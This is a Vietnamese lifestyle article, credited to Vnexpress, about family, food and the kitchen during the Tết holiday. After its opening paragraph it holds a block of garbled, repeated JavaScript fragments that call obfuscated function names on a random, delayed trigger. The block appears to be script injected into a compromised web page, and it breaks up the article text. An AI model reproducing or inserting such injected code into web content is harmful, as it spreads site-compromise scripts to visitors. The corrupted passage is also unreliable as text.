Không gian bếp ngày tết gắn kết gia đình

Mùa xuân của vạn vật, của đất trời đang len lỏi vào từng mái nhà, từng con phố nhỏ, nhiều người sẽ bồi hồi nhớ lại những cái Tết đoàn viên, ấm cúng bên gia đình, bên ông bà, bố mẹ, đặc biệt là những người ở xa quê hương.andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}

Tuổi thơ của mỗi người lớn lên cùng lời ru của mẹ, từ những buổi chiều xế bóng bên góc bếp nhỏ nơi lửa đỏ, than hồng, vì vậy, gian bếp đã trở nên gắn bó, gần gũi. Đối với những người con xa xứ nơi đất lạ quê người, mỗi khi nhớ nhà, hình ảnh mẹ bên gian bếp thân thương thường hiện lên, đó là nỗi nhớ bồi hồi, xúc động.

Khi nhành mai đâm chồi nảy lộc là dấu hiệu báo xuân đang tới. Năm nào cũng thế, cứ từ 23 tháng Chạp là các gia đình lại sắm đồ Tết. Ra chợ những ngày cuối năm mới, ai ai cũng cảm nhận được không khí Tết, thấy hơi xuân đang tràn ngập trên từng con phố, căn nhà, ngõ chợ. Các gian hàng Tết đa dạng sản phẩm đủ loại: bóng bì, lưỡi lợn, đỗ xanh, gạo nếp, gia vị, dầu ăn… để nhà nhà chuẩn bị cho những bữa ăn ngày Tết; cây đào, cành quất thổi thêm khí xuân đất trời trong căn nhà nhỏ…

không gian bếp ngày tết gắn kết gia đình

Bữa cơm hằng ngày luôn là nơi gắn kết tình cảm của gia đình

Trong không gian bếp đó, đôi bàn tay khéo léo cùng những giọt mồ hôi của mẹ đã chế biến ra những món ăn đặc trưng hương vị Tết như bánh chưng, thịt mỡ, dưa hành, củ kiệu. Những chiều đông giáp Tết, các gia đình lại quây quần trong căn bếp nhỏ, chuẩn bị bữa tối tất niên. Mỗi khi chế biến bữa ăn cho gia đình, các mẹ thường dùng loại dầu ăn ngon để mùi hành tỏi phi thêm thơm lừng. Tiếng xèo xèo vui tai của nem rán trong chảo dầu sóng sánh, tiếng kêu tí tách của củi than bên ánh lửa bập bùng làm nên những mùa xuân ngập tràn hạnh phúc, đầm ấm và ý nghĩa.

Không gian bếp cho ngày tết

Trong thời khắc giao mùa của mùa xuân đang tới, mọi người lại càng như được thôi thúc để trở về với mái nhà thân thương, về bên ông bà, bố mẹ, về với gian bếp nhỏ. Mùa xuân này sẽ ấm áp hơn khi những người con xa quê được trở về để sum họp, đoàn viên với người thân sau những tháng ngày xa cách. Một món quà xuân ý nghĩa gói trọn yêu thương sẽ làm cho gian bếp xuân càng thêm ấm cúng. Màu xanh của bánh chưng, sắc hồng của đào phai hòa cùng sắc đỏ may mắn của những túi quà Tết sẽ điểm tô và làm sống lên mùa xuân trong gian bếp nhỏ.

Nguồn : Vnexpress

Các Đối Tác Lớn